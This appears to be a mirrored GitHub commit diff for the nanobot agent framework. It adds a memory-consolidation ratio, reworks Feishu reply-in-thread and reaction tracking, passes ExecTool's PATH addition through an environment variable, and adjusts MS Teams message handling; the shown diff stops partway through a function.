mirror of
https://github.com/HKUDS/nanobot.git
synced 2026-05-03 08:15:53 +00:00
Merge origin/main into webui-settings
Made-with: Cursor
This commit is contained in:
commit
65b0ae81af
@ -191,6 +191,7 @@ class AgentLoop:
|
|||||||
channels_config: ChannelsConfig | None = None,
|
channels_config: ChannelsConfig | None = None,
|
||||||
timezone: str | None = None,
|
timezone: str | None = None,
|
||||||
session_ttl_minutes: int = 0,
|
session_ttl_minutes: int = 0,
|
||||||
|
consolidation_ratio: float = 0.5,
|
||||||
hooks: list[AgentHook] | None = None,
|
hooks: list[AgentHook] | None = None,
|
||||||
unified_session: bool = False,
|
unified_session: bool = False,
|
||||||
disabled_skills: list[str] | None = None,
|
disabled_skills: list[str] | None = None,
|
||||||
@ -274,6 +275,7 @@ class AgentLoop:
|
|||||||
build_messages=self.context.build_messages,
|
build_messages=self.context.build_messages,
|
||||||
get_tool_definitions=self.tools.get_definitions,
|
get_tool_definitions=self.tools.get_definitions,
|
||||||
max_completion_tokens=provider.generation.max_tokens,
|
max_completion_tokens=provider.generation.max_tokens,
|
||||||
|
consolidation_ratio=consolidation_ratio,
|
||||||
)
|
)
|
||||||
self.auto_compact = AutoCompact(
|
self.auto_compact = AutoCompact(
|
||||||
sessions=self.sessions,
|
sessions=self.sessions,
|
||||||
|
|||||||
@ -435,6 +435,7 @@ class Consolidator:
|
|||||||
build_messages: Callable[..., list[dict[str, Any]]],
|
build_messages: Callable[..., list[dict[str, Any]]],
|
||||||
get_tool_definitions: Callable[[], list[dict[str, Any]]],
|
get_tool_definitions: Callable[[], list[dict[str, Any]]],
|
||||||
max_completion_tokens: int = 4096,
|
max_completion_tokens: int = 4096,
|
||||||
|
consolidation_ratio: float = 0.5,
|
||||||
):
|
):
|
||||||
self.store = store
|
self.store = store
|
||||||
self.provider = provider
|
self.provider = provider
|
||||||
@ -442,6 +443,7 @@ class Consolidator:
|
|||||||
self.sessions = sessions
|
self.sessions = sessions
|
||||||
self.context_window_tokens = context_window_tokens
|
self.context_window_tokens = context_window_tokens
|
||||||
self.max_completion_tokens = max_completion_tokens
|
self.max_completion_tokens = max_completion_tokens
|
||||||
|
self.consolidation_ratio = consolidation_ratio
|
||||||
self._build_messages = build_messages
|
self._build_messages = build_messages
|
||||||
self._get_tool_definitions = get_tool_definitions
|
self._get_tool_definitions = get_tool_definitions
|
||||||
self._locks: weakref.WeakValueDictionary[str, asyncio.Lock] = (
|
self._locks: weakref.WeakValueDictionary[str, asyncio.Lock] = (
|
||||||
@ -568,7 +570,7 @@ class Consolidator:
|
|||||||
lock = self.get_lock(session.key)
|
lock = self.get_lock(session.key)
|
||||||
async with lock:
|
async with lock:
|
||||||
budget = self._input_token_budget
|
budget = self._input_token_budget
|
||||||
target = budget // 2
|
target = int(budget * self.consolidation_ratio)
|
||||||
try:
|
try:
|
||||||
estimated, source = self.estimate_session_prompt_tokens(
|
estimated, source = self.estimate_session_prompt_tokens(
|
||||||
session,
|
session,
|
||||||
|
|||||||
@ -42,6 +42,10 @@ class MessageTool(Tool):
|
|||||||
default=default_message_id,
|
default=default_message_id,
|
||||||
)
|
)
|
||||||
self._sent_in_turn_var: ContextVar[bool] = ContextVar("message_sent_in_turn", default=False)
|
self._sent_in_turn_var: ContextVar[bool] = ContextVar("message_sent_in_turn", default=False)
|
||||||
|
self._record_channel_delivery_var: ContextVar[bool] = ContextVar(
|
||||||
|
"message_record_channel_delivery",
|
||||||
|
default=False,
|
||||||
|
)
|
||||||
|
|
||||||
def set_context(self, channel: str, chat_id: str, message_id: str | None = None) -> None:
|
def set_context(self, channel: str, chat_id: str, message_id: str | None = None) -> None:
|
||||||
"""Set the current message context."""
|
"""Set the current message context."""
|
||||||
@ -57,6 +61,14 @@ class MessageTool(Tool):
|
|||||||
"""Reset per-turn send tracking."""
|
"""Reset per-turn send tracking."""
|
||||||
self._sent_in_turn = False
|
self._sent_in_turn = False
|
||||||
|
|
||||||
|
def set_record_channel_delivery(self, active: bool):
|
||||||
|
"""Mark tool-sent messages as proactive channel deliveries."""
|
||||||
|
return self._record_channel_delivery_var.set(active)
|
||||||
|
|
||||||
|
def reset_record_channel_delivery(self, token) -> None:
|
||||||
|
"""Restore previous proactive delivery recording state."""
|
||||||
|
self._record_channel_delivery_var.reset(token)
|
||||||
|
|
||||||
@property
|
@property
|
||||||
def _sent_in_turn(self) -> bool:
|
def _sent_in_turn(self) -> bool:
|
||||||
return self._sent_in_turn_var.get()
|
return self._sent_in_turn_var.get()
|
||||||
@ -117,15 +129,19 @@ class MessageTool(Tool):
|
|||||||
if not self._send_callback:
|
if not self._send_callback:
|
||||||
return "Error: Message sending not configured"
|
return "Error: Message sending not configured"
|
||||||
|
|
||||||
|
metadata = {
|
||||||
|
"message_id": message_id,
|
||||||
|
} if message_id else {}
|
||||||
|
if self._record_channel_delivery_var.get():
|
||||||
|
metadata["_record_channel_delivery"] = True
|
||||||
|
|
||||||
msg = OutboundMessage(
|
msg = OutboundMessage(
|
||||||
channel=channel,
|
channel=channel,
|
||||||
chat_id=chat_id,
|
chat_id=chat_id,
|
||||||
content=content,
|
content=content,
|
||||||
media=media or [],
|
media=media or [],
|
||||||
buttons=buttons or [],
|
buttons=buttons or [],
|
||||||
metadata={
|
metadata=metadata,
|
||||||
"message_id": message_id,
|
|
||||||
} if message_id else {},
|
|
||||||
)
|
)
|
||||||
|
|
||||||
try:
|
try:
|
||||||
|
|||||||
@ -136,9 +136,10 @@ class ExecTool(Tool):
|
|||||||
|
|
||||||
if self.path_append:
|
if self.path_append:
|
||||||
if _IS_WINDOWS:
|
if _IS_WINDOWS:
|
||||||
env["PATH"] = env.get("PATH", "") + ";" + self.path_append
|
env["PATH"] = env.get("PATH", "") + os.pathsep + self.path_append
|
||||||
else:
|
else:
|
||||||
command = f'export PATH="$PATH:{self.path_append}"; {command}'
|
env["NANOBOT_PATH_APPEND"] = self.path_append
|
||||||
|
command = f'export PATH="$PATH{os.pathsep}$NANOBOT_PATH_APPEND"; {command}'
|
||||||
|
|
||||||
try:
|
try:
|
||||||
process = await self._spawn(command, cwd, env)
|
process = await self._spawn(command, cwd, env)
|
||||||
|
|||||||
@ -13,6 +13,7 @@ from dataclasses import dataclass
|
|||||||
from typing import Any, Literal
|
from typing import Any, Literal
|
||||||
|
|
||||||
from lark_oapi.api.im.v1.model import MentionEvent, P2ImMessageReceiveV1
|
from lark_oapi.api.im.v1.model import MentionEvent, P2ImMessageReceiveV1
|
||||||
|
from lark_oapi.core.const import FEISHU_DOMAIN, LARK_DOMAIN
|
||||||
from loguru import logger
|
from loguru import logger
|
||||||
from pydantic import Field
|
from pydantic import Field
|
||||||
|
|
||||||
@ -22,8 +23,6 @@ from nanobot.channels.base import BaseChannel
|
|||||||
from nanobot.config.paths import get_media_dir
|
from nanobot.config.paths import get_media_dir
|
||||||
from nanobot.config.schema import Base
|
from nanobot.config.schema import Base
|
||||||
|
|
||||||
from lark_oapi.core.const import FEISHU_DOMAIN, LARK_DOMAIN
|
|
||||||
|
|
||||||
FEISHU_AVAILABLE = importlib.util.find_spec("lark_oapi") is not None
|
FEISHU_AVAILABLE = importlib.util.find_spec("lark_oapi") is not None
|
||||||
|
|
||||||
# Message type display mapping
|
# Message type display mapping
|
||||||
@ -308,6 +307,8 @@ class FeishuChannel(BaseChannel):
|
|||||||
self._loop: asyncio.AbstractEventLoop | None = None
|
self._loop: asyncio.AbstractEventLoop | None = None
|
||||||
self._stream_bufs: dict[str, _FeishuStreamBuf] = {}
|
self._stream_bufs: dict[str, _FeishuStreamBuf] = {}
|
||||||
self._bot_open_id: str | None = None
|
self._bot_open_id: str | None = None
|
||||||
|
self._background_tasks: set[asyncio.Task] = set()
|
||||||
|
self._reaction_ids: dict[str, str] = {} # message_id → reaction_id
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def _register_optional_event(builder: Any, method_name: str, handler: Any) -> Any:
|
def _register_optional_event(builder: Any, method_name: str, handler: Any) -> Any:
|
||||||
@ -549,8 +550,11 @@ class FeishuChannel(BaseChannel):
|
|||||||
return None
|
return None
|
||||||
|
|
||||||
async def _add_reaction(self, message_id: str, emoji_type: str = "THUMBSUP") -> str | None:
|
async def _add_reaction(self, message_id: str, emoji_type: str = "THUMBSUP") -> str | None:
|
||||||
"""
|
"""Add a reaction emoji to a message.
|
||||||
Add a reaction emoji to a message (non-blocking).
|
|
||||||
|
Returns the reaction_id on success, None on failure.
|
||||||
|
When called via a tracked background task, the returned reaction_id
|
||||||
|
is stored in ``_reaction_ids`` for later cleanup by ``send_delta``.
|
||||||
|
|
||||||
Common emoji types: THUMBSUP, OK, EYES, DONE, OnIt, HEART
|
Common emoji types: THUMBSUP, OK, EYES, DONE, OnIt, HEART
|
||||||
"""
|
"""
|
||||||
@ -594,6 +598,36 @@ class FeishuChannel(BaseChannel):
|
|||||||
loop = asyncio.get_running_loop()
|
loop = asyncio.get_running_loop()
|
||||||
await loop.run_in_executor(None, self._remove_reaction_sync, message_id, reaction_id)
|
await loop.run_in_executor(None, self._remove_reaction_sync, message_id, reaction_id)
|
||||||
|
|
||||||
|
def _on_background_task_done(self, task: asyncio.Task) -> None:
|
||||||
|
"""Callback: remove from tracking set and log unhandled exceptions."""
|
||||||
|
self._background_tasks.discard(task)
|
||||||
|
if task.cancelled():
|
||||||
|
return
|
||||||
|
try:
|
||||||
|
task.result()
|
||||||
|
except Exception as exc:
|
||||||
|
logger.warning("Background task failed: {}", exc)
|
||||||
|
|
||||||
|
def _on_reaction_added(self, message_id: str, task: asyncio.Task) -> None:
|
||||||
|
"""Callback: store reaction_id after background add-reaction completes."""
|
||||||
|
if task.cancelled():
|
||||||
|
return
|
||||||
|
try:
|
||||||
|
reaction_id = task.result()
|
||||||
|
if reaction_id:
|
||||||
|
self._reaction_ids[message_id] = reaction_id
|
||||||
|
except Exception:
|
||||||
|
pass # already logged by _on_background_task_done
|
||||||
|
# Trim cache to prevent unbounded growth
|
||||||
|
if len(self._reaction_ids) > 500:
|
||||||
|
self._reaction_ids.pop(next(iter(self._reaction_ids)))
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def _stream_key(chat_id: str, metadata: dict[str, Any] | None = None) -> str:
|
||||||
|
"""Scope streaming buffers to the inbound message when available."""
|
||||||
|
meta = metadata or {}
|
||||||
|
return meta.get("message_id") or chat_id
|
||||||
|
|
||||||
# Regex to match markdown tables (header + separator + data rows)
|
# Regex to match markdown tables (header + separator + data rows)
|
||||||
_TABLE_RE = re.compile(
|
_TABLE_RE = re.compile(
|
||||||
r"((?:^[ \t]*\|.+\|[ \t]*\n)(?:^[ \t]*\|[-:\s|]+\|[ \t]*\n)(?:^[ \t]*\|.+\|[ \t]*\n?)+)",
|
r"((?:^[ \t]*\|.+\|[ \t]*\n)(?:^[ \t]*\|[-:\s|]+\|[ \t]*\n)(?:^[ \t]*\|.+\|[ \t]*\n?)+)",
|
||||||
@ -1101,17 +1135,23 @@ class FeishuChannel(BaseChannel):
|
|||||||
logger.debug("Feishu: error fetching parent message {}: {}", message_id, e)
|
logger.debug("Feishu: error fetching parent message {}: {}", message_id, e)
|
||||||
return None
|
return None
|
||||||
|
|
||||||
def _reply_message_sync(self, parent_message_id: str, msg_type: str, content: str) -> bool:
|
def _reply_message_sync(self, parent_message_id: str, msg_type: str, content: str, *, reply_in_thread: bool = False) -> bool:
|
||||||
"""Reply to an existing Feishu message using the Reply API (synchronous)."""
|
"""Reply to an existing Feishu message using the Reply API (synchronous).
|
||||||
|
|
||||||
|
Args:
|
||||||
|
reply_in_thread: If True, reply as a thread/topic message
|
||||||
|
in the Feishu client.
|
||||||
|
"""
|
||||||
from lark_oapi.api.im.v1 import ReplyMessageRequest, ReplyMessageRequestBody
|
from lark_oapi.api.im.v1 import ReplyMessageRequest, ReplyMessageRequestBody
|
||||||
|
|
||||||
try:
|
try:
|
||||||
|
body_builder = ReplyMessageRequestBody.builder().msg_type(msg_type).content(content)
|
||||||
|
if reply_in_thread:
|
||||||
|
body_builder = body_builder.reply_in_thread(True)
|
||||||
request = (
|
request = (
|
||||||
ReplyMessageRequest.builder()
|
ReplyMessageRequest.builder()
|
||||||
.message_id(parent_message_id)
|
.message_id(parent_message_id)
|
||||||
.request_body(
|
.request_body(body_builder.build())
|
||||||
ReplyMessageRequestBody.builder().msg_type(msg_type).content(content).build()
|
|
||||||
)
|
|
||||||
.build()
|
.build()
|
||||||
)
|
)
|
||||||
response = self._client.im.v1.message.reply(request)
|
response = self._client.im.v1.message.reply(request)
|
||||||
@ -1166,8 +1206,19 @@ class FeishuChannel(BaseChannel):
|
|||||||
logger.error("Error sending Feishu {} message: {}", msg_type, e)
|
logger.error("Error sending Feishu {} message: {}", msg_type, e)
|
||||||
return None
|
return None
|
||||||
|
|
||||||
def _create_streaming_card_sync(self, receive_id_type: str, chat_id: str) -> str | None:
|
def _create_streaming_card_sync(
|
||||||
"""Create a CardKit streaming card, send it to chat, return card_id."""
|
self,
|
||||||
|
receive_id_type: str,
|
||||||
|
chat_id: str,
|
||||||
|
reply_message_id: str | None = None,
|
||||||
|
) -> str | None:
|
||||||
|
"""Create a CardKit streaming card, send it to chat, return card_id.
|
||||||
|
|
||||||
|
When *reply_message_id* is provided the card is delivered via the
|
||||||
|
reply API (with reply_in_thread=True) so it lands inside the
|
||||||
|
originating thread / topic. Otherwise the plain create-message
|
||||||
|
API is used.
|
||||||
|
"""
|
||||||
from lark_oapi.api.cardkit.v1 import CreateCardRequest, CreateCardRequestBody
|
from lark_oapi.api.cardkit.v1 import CreateCardRequest, CreateCardRequestBody
|
||||||
|
|
||||||
card_json = {
|
card_json = {
|
||||||
@ -1196,13 +1247,19 @@ class FeishuChannel(BaseChannel):
|
|||||||
return None
|
return None
|
||||||
card_id = getattr(response.data, "card_id", None)
|
card_id = getattr(response.data, "card_id", None)
|
||||||
if card_id:
|
if card_id:
|
||||||
message_id = self._send_message_sync(
|
card_content = json.dumps(
|
||||||
receive_id_type,
|
{"type": "card", "data": {"card_id": card_id}}, ensure_ascii=False
|
||||||
chat_id,
|
|
||||||
"interactive",
|
|
||||||
json.dumps({"type": "card", "data": {"card_id": card_id}}),
|
|
||||||
)
|
)
|
||||||
if message_id:
|
if reply_message_id:
|
||||||
|
sent = self._reply_message_sync(
|
||||||
|
reply_message_id, "interactive", card_content,
|
||||||
|
reply_in_thread=True,
|
||||||
|
)
|
||||||
|
else:
|
||||||
|
sent = self._send_message_sync(
|
||||||
|
receive_id_type, chat_id, "interactive", card_content,
|
||||||
|
) is not None
|
||||||
|
if sent:
|
||||||
return card_id
|
return card_id
|
||||||
logger.warning(
|
logger.warning(
|
||||||
"Created streaming card {} but failed to send it to {}", card_id, chat_id
|
"Created streaming card {} but failed to send it to {}", card_id, chat_id
|
||||||
@ -1292,23 +1349,27 @@ class FeishuChannel(BaseChannel):
|
|||||||
_stream_end: Finalize the streaming card.
|
_stream_end: Finalize the streaming card.
|
||||||
_tool_hint: Delta is a formatted tool hint (for display only).
|
_tool_hint: Delta is a formatted tool hint (for display only).
|
||||||
message_id: Original message id (used with _stream_end for reaction cleanup).
|
message_id: Original message id (used with _stream_end for reaction cleanup).
|
||||||
reaction_id: Reaction id to remove on stream end.
|
chat_type: "group" or "p2p" — controls reply-in-thread for streaming cards.
|
||||||
"""
|
"""
|
||||||
if not self._client:
|
if not self._client:
|
||||||
return
|
return
|
||||||
meta = metadata or {}
|
meta = metadata or {}
|
||||||
|
stream_key = self._stream_key(chat_id, meta)
|
||||||
loop = asyncio.get_running_loop()
|
loop = asyncio.get_running_loop()
|
||||||
rid_type = "chat_id" if chat_id.startswith("oc_") else "open_id"
|
rid_type = "chat_id" if chat_id.startswith("oc_") else "open_id"
|
||||||
|
|
||||||
# --- stream end: final update or fallback ---
|
# --- stream end: final update or fallback ---
|
||||||
if meta.get("_stream_end"):
|
if meta.get("_stream_end"):
|
||||||
if (message_id := meta.get("message_id")) and (reaction_id := meta.get("reaction_id")):
|
message_id = meta.get("message_id")
|
||||||
await self._remove_reaction(message_id, reaction_id)
|
if message_id:
|
||||||
|
reaction_id = self._reaction_ids.pop(message_id, None)
|
||||||
|
if reaction_id:
|
||||||
|
await self._remove_reaction(message_id, reaction_id)
|
||||||
# Add completion emoji if configured
|
# Add completion emoji if configured
|
||||||
if self.config.done_emoji and message_id:
|
if self.config.done_emoji:
|
||||||
await self._add_reaction(message_id, self.config.done_emoji)
|
await self._add_reaction(message_id, self.config.done_emoji)
|
||||||
|
|
||||||
buf = self._stream_bufs.pop(chat_id, None)
|
buf = self._stream_bufs.pop(stream_key, None)
|
||||||
if not buf or not buf.text:
|
if not buf or not buf.text:
|
||||||
return
|
return
|
||||||
# Try to finalize via streaming card; if that fails (e.g.
|
# Try to finalize via streaming card; if that fails (e.g.
|
||||||
@ -1343,24 +1404,45 @@ class FeishuChannel(BaseChannel):
|
|||||||
{"config": {"wide_screen_mode": True}, "elements": chunk},
|
{"config": {"wide_screen_mode": True}, "elements": chunk},
|
||||||
ensure_ascii=False,
|
ensure_ascii=False,
|
||||||
)
|
)
|
||||||
await loop.run_in_executor(
|
# Fallback: reply via the Reply API for group chats.
|
||||||
None, self._send_message_sync, rid_type, chat_id, "interactive", card
|
# Target message_id — the Feishu API keeps the reply in
|
||||||
)
|
# the same topic automatically.
|
||||||
|
_f_msg = meta.get("message_id")
|
||||||
|
fallback_msg_id = _f_msg if meta.get("chat_type", "group") == "group" else None
|
||||||
|
if fallback_msg_id:
|
||||||
|
await loop.run_in_executor(
|
||||||
|
None, lambda: self._reply_message_sync(
|
||||||
|
fallback_msg_id, "interactive", card,
|
||||||
|
reply_in_thread=True,
|
||||||
|
),
|
||||||
|
)
|
||||||
|
else:
|
||||||
|
await loop.run_in_executor(
|
||||||
|
None, self._send_message_sync, rid_type, chat_id, "interactive", card
|
||||||
|
)
|
||||||
return
|
return
|
||||||
|
|
||||||
# --- accumulate delta ---
|
# --- accumulate delta ---
|
||||||
buf = self._stream_bufs.get(chat_id)
|
buf = self._stream_bufs.get(stream_key)
|
||||||
if buf is None:
|
if buf is None:
|
||||||
buf = _FeishuStreamBuf()
|
buf = _FeishuStreamBuf()
|
||||||
self._stream_bufs[chat_id] = buf
|
self._stream_bufs[stream_key] = buf
|
||||||
buf.text += delta
|
buf.text += delta
|
||||||
if not buf.text.strip():
|
if not buf.text.strip():
|
||||||
return
|
return
|
||||||
|
|
||||||
now = time.monotonic()
|
now = time.monotonic()
|
||||||
if buf.card_id is None:
|
if buf.card_id is None:
|
||||||
|
# Send the streaming card as a reply for group chats so it
|
||||||
|
# lands inside the originating topic/thread. Always target
|
||||||
|
# message_id (the actual inbound message) — the Feishu Reply
|
||||||
|
# API keeps the response in the same topic automatically.
|
||||||
|
is_group = meta.get("chat_type", "group") == "group"
|
||||||
|
reply_msg_id = meta.get("message_id") if is_group else None
|
||||||
card_id = await loop.run_in_executor(
|
card_id = await loop.run_in_executor(
|
||||||
None, self._create_streaming_card_sync, rid_type, chat_id
|
None,
|
||||||
|
self._create_streaming_card_sync,
|
||||||
|
rid_type, chat_id, reply_msg_id,
|
||||||
)
|
)
|
||||||
if card_id:
|
if card_id:
|
||||||
buf.card_id = card_id
|
buf.card_id = card_id
|
||||||
@ -1393,7 +1475,7 @@ class FeishuChannel(BaseChannel):
|
|||||||
hint = (msg.content or "").strip()
|
hint = (msg.content or "").strip()
|
||||||
if not hint:
|
if not hint:
|
||||||
return
|
return
|
||||||
buf = self._stream_bufs.get(msg.chat_id)
|
buf = self._stream_bufs.get(self._stream_key(msg.chat_id, msg.metadata))
|
||||||
if buf and buf.card_id:
|
if buf and buf.card_id:
|
||||||
# Delegate to send_delta so tool hints get the same
|
# Delegate to send_delta so tool hints get the same
|
||||||
# throttling (and card creation) as regular text deltas.
|
# throttling (and card creation) as regular text deltas.
|
||||||
@ -1404,37 +1486,59 @@ class FeishuChannel(BaseChannel):
|
|||||||
return
|
return
|
||||||
# No active streaming card — send as a regular
|
# No active streaming card — send as a regular
|
||||||
# interactive card with the same 🔧 prefix style.
|
# interactive card with the same 🔧 prefix style.
|
||||||
|
# Use reply API for group chats so the hint stays in topic.
|
||||||
card = json.dumps(
|
card = json.dumps(
|
||||||
{"config": {"wide_screen_mode": True}, "elements": [
|
{"config": {"wide_screen_mode": True}, "elements": [
|
||||||
{"tag": "markdown", "content": self._format_tool_hint_delta(hint)},
|
{"tag": "markdown", "content": self._format_tool_hint_delta(hint)},
|
||||||
]},
|
]},
|
||||||
ensure_ascii=False,
|
ensure_ascii=False,
|
||||||
)
|
)
|
||||||
await loop.run_in_executor(
|
_th_msg_id = msg.metadata.get("message_id")
|
||||||
None, self._send_message_sync, receive_id_type, msg.chat_id, "interactive", card
|
_th_chat_type = msg.metadata.get("chat_type", "group")
|
||||||
)
|
if _th_msg_id and _th_chat_type == "group":
|
||||||
|
await loop.run_in_executor(
|
||||||
|
None, lambda: self._reply_message_sync(
|
||||||
|
_th_msg_id, "interactive", card,
|
||||||
|
reply_in_thread=True,
|
||||||
|
),
|
||||||
|
)
|
||||||
|
else:
|
||||||
|
await loop.run_in_executor(
|
||||||
|
None, self._send_message_sync, receive_id_type, msg.chat_id, "interactive", card
|
||||||
|
)
|
||||||
return
|
return
|
||||||
|
|
||||||
# Determine whether the first message should quote the user's message.
|
# Determine whether the first message should quote the user's message.
|
||||||
# Only the very first send (media or text) in this call uses reply; subsequent
|
# Only the very first send (media or text) in this call uses reply; subsequent
|
||||||
# chunks/media fall back to plain create to avoid redundant quote bubbles.
|
# chunks/media fall back to plain create to avoid redundant quote bubbles.
|
||||||
|
# Always target message_id — the Feishu Reply API keeps replies in the
|
||||||
|
# same topic automatically when the target message is inside a topic.
|
||||||
reply_message_id: str | None = None
|
reply_message_id: str | None = None
|
||||||
|
_msg_id = msg.metadata.get("message_id")
|
||||||
if self.config.reply_to_message and not msg.metadata.get("_progress", False):
|
if self.config.reply_to_message and not msg.metadata.get("_progress", False):
|
||||||
reply_message_id = msg.metadata.get("message_id") or None
|
reply_message_id = _msg_id
|
||||||
# For topic group messages, always reply to keep context in thread
|
# For topic group messages, always reply to keep context in thread
|
||||||
elif msg.metadata.get("thread_id"):
|
elif msg.metadata.get("thread_id"):
|
||||||
reply_message_id = (
|
reply_message_id = _msg_id
|
||||||
msg.metadata.get("root_id") or msg.metadata.get("message_id") or None
|
|
||||||
)
|
|
||||||
|
|
||||||
first_send = True # tracks whether the reply has already been used
|
first_send = True # tracks whether the reply has already been used
|
||||||
|
|
||||||
def _do_send(m_type: str, content: str) -> None:
|
def _do_send(m_type: str, content: str) -> None:
|
||||||
"""Send via reply (first message) or create (subsequent)."""
|
"""Send via reply (first message) or create (subsequent).
|
||||||
|
|
||||||
|
For group chats the reply API always uses reply_in_thread=True.
|
||||||
|
The Feishu API automatically keeps replies inside existing
|
||||||
|
topics — reply_in_thread only creates a *new* topic when the
|
||||||
|
target message is a plain (non-topic) message.
|
||||||
|
"""
|
||||||
nonlocal first_send
|
nonlocal first_send
|
||||||
if reply_message_id and first_send:
|
if reply_message_id and first_send:
|
||||||
first_send = False
|
first_send = False
|
||||||
ok = self._reply_message_sync(reply_message_id, m_type, content)
|
chat_type = msg.metadata.get("chat_type", "group")
|
||||||
|
ok = self._reply_message_sync(
|
||||||
|
reply_message_id, m_type, content,
|
||||||
|
reply_in_thread=chat_type == "group",
|
||||||
|
)
|
||||||
if ok:
|
if ok:
|
||||||
return
|
return
|
||||||
# Fall back to regular send if reply fails
|
# Fall back to regular send if reply fails
|
||||||
@ -1543,8 +1647,13 @@ class FeishuChannel(BaseChannel):
|
|||||||
logger.debug("Feishu: skipping group message (not mentioned)")
|
logger.debug("Feishu: skipping group message (not mentioned)")
|
||||||
return
|
return
|
||||||
|
|
||||||
# Add reaction
|
# Add reaction (non-blocking — tracked background task)
|
||||||
reaction_id = await self._add_reaction(message_id, self.config.react_emoji)
|
task = asyncio.create_task(
|
||||||
|
self._add_reaction(message_id, self.config.react_emoji)
|
||||||
|
)
|
||||||
|
self._background_tasks.add(task)
|
||||||
|
task.add_done_callback(self._on_background_task_done)
|
||||||
|
task.add_done_callback(lambda t: self._on_reaction_added(message_id, t))
|
||||||
|
|
||||||
# Parse content
|
# Parse content
|
||||||
content_parts = []
|
content_parts = []
|
||||||
@ -1624,6 +1733,15 @@ class FeishuChannel(BaseChannel):
|
|||||||
if not content and not media_paths:
|
if not content and not media_paths:
|
||||||
return
|
return
|
||||||
|
|
||||||
|
# Build topic-scoped session key for conversation isolation.
|
||||||
|
# Group chat: each topic gets its own session via root_id (replies
|
||||||
|
# inside a topic) or message_id (top-level messages start a new topic).
|
||||||
|
# Private chat: no override — same behavior as Telegram/Slack.
|
||||||
|
if chat_type == "group":
|
||||||
|
session_key = f"feishu:{chat_id}:{root_id or message_id}"
|
||||||
|
else:
|
||||||
|
session_key = None
|
||||||
|
|
||||||
# Forward to message bus
|
# Forward to message bus
|
||||||
reply_to = chat_id if chat_type == "group" else sender_id
|
reply_to = chat_id if chat_type == "group" else sender_id
|
||||||
await self._handle_message(
|
await self._handle_message(
|
||||||
@ -1633,13 +1751,13 @@ class FeishuChannel(BaseChannel):
|
|||||||
media=media_paths,
|
media=media_paths,
|
||||||
metadata={
|
metadata={
|
||||||
"message_id": message_id,
|
"message_id": message_id,
|
||||||
"reaction_id": reaction_id,
|
|
||||||
"chat_type": chat_type,
|
"chat_type": chat_type,
|
||||||
"msg_type": msg_type,
|
"msg_type": msg_type,
|
||||||
"parent_id": parent_id,
|
"parent_id": parent_id,
|
||||||
"root_id": root_id,
|
"root_id": root_id,
|
||||||
"thread_id": thread_id,
|
"thread_id": thread_id,
|
||||||
},
|
},
|
||||||
|
session_key=session_key,
|
||||||
)
|
)
|
||||||
|
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
|
|||||||
@ -70,6 +70,7 @@ class ConversationRef:
|
|||||||
activity_id: str | None = None
|
activity_id: str | None = None
|
||||||
conversation_type: str | None = None
|
conversation_type: str | None = None
|
||||||
tenant_id: str | None = None
|
tenant_id: str | None = None
|
||||||
|
updated_at: float | None = None
|
||||||
|
|
||||||
|
|
||||||
class MSTeamsChannel(BaseChannel):
|
class MSTeamsChannel(BaseChannel):
|
||||||
@ -220,7 +221,6 @@ class MSTeamsChannel(BaseChannel):
|
|||||||
token = await self._get_access_token()
|
token = await self._get_access_token()
|
||||||
base_url = f"{ref.service_url.rstrip('/')}/v3/conversations/{ref.conversation_id}/activities"
|
base_url = f"{ref.service_url.rstrip('/')}/v3/conversations/{ref.conversation_id}/activities"
|
||||||
use_thread_reply = self.config.reply_in_thread and bool(ref.activity_id)
|
use_thread_reply = self.config.reply_in_thread and bool(ref.activity_id)
|
||||||
url = f"{base_url}/{ref.activity_id}" if use_thread_reply else base_url
|
|
||||||
headers = {
|
headers = {
|
||||||
"Authorization": f"Bearer {token}",
|
"Authorization": f"Bearer {token}",
|
||||||
"Content-Type": "application/json",
|
"Content-Type": "application/json",
|
||||||
@ -233,7 +233,7 @@ class MSTeamsChannel(BaseChannel):
|
|||||||
payload["replyToId"] = ref.activity_id
|
payload["replyToId"] = ref.activity_id
|
||||||
|
|
||||||
try:
|
try:
|
||||||
resp = await self._http.post(url, headers=headers, json=payload)
|
resp = await self._http.post(base_url, headers=headers, json=payload)
|
||||||
resp.raise_for_status()
|
resp.raise_for_status()
|
||||||
logger.info("MSTeams message sent to {}", ref.conversation_id)
|
logger.info("MSTeams message sent to {}", ref.conversation_id)
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
@ -289,7 +289,9 @@ class MSTeamsChannel(BaseChannel):
|
|||||||
activity_id=activity_id or None,
|
activity_id=activity_id or None,
|
||||||
conversation_type=conversation_type or None,
|
conversation_type=conversation_type or None,
|
||||||
tenant_id=str((channel_data.get("tenant") or {}).get("id") or "") or None,
|
tenant_id=str((channel_data.get("tenant") or {}).get("id") or "") or None,
|
||||||
|
updated_at=time.time(),
|
||||||
)
|
)
|
||||||
|
|
||||||
self._save_refs()
|
self._save_refs()
|
||||||
|
|
||||||
await self._handle_message(
|
await self._handle_message(
|
||||||
@ -310,10 +312,12 @@ class MSTeamsChannel(BaseChannel):
|
|||||||
"""Extract the user-authored text from a Teams activity."""
|
"""Extract the user-authored text from a Teams activity."""
|
||||||
text = str(activity.get("text") or "")
|
text = str(activity.get("text") or "")
|
||||||
text = self._strip_possible_bot_mention(text)
|
text = self._strip_possible_bot_mention(text)
|
||||||
|
text = self._normalize_html_whitespace(text)
|
||||||
|
|
||||||
channel_data = activity.get("channelData") or {}
|
channel_data = activity.get("channelData") or {}
|
||||||
reply_to_id = str(activity.get("replyToId") or "").strip()
|
reply_to_id = str(activity.get("replyToId") or "").strip()
|
||||||
normalized_preview = html.unescape(text).replace("&rsquo", "’").strip()
|
normalized_preview = html.unescape(text).replace("&rsquo", "’").strip()
|
||||||
|
normalized_preview = normalized_preview.replace("\xa0", " ")
|
||||||
normalized_preview = normalized_preview.replace("\r\n", "\n").replace("\r", "\n")
|
normalized_preview = normalized_preview.replace("\r\n", "\n").replace("\r", "\n")
|
||||||
preview_lines = [line.strip() for line in normalized_preview.split("\n")]
|
preview_lines = [line.strip() for line in normalized_preview.split("\n")]
|
||||||
while preview_lines and not preview_lines[0]:
|
while preview_lines and not preview_lines[0]:
|
||||||
@ -333,9 +337,15 @@ class MSTeamsChannel(BaseChannel):
|
|||||||
cleaned = re.sub(r"(?:\r?\n){3,}", "\n\n", cleaned)
|
cleaned = re.sub(r"(?:\r?\n){3,}", "\n\n", cleaned)
|
||||||
return cleaned.strip()
|
return cleaned.strip()
|
||||||
|
|
||||||
|
def _normalize_html_whitespace(self, text: str) -> str:
|
||||||
|
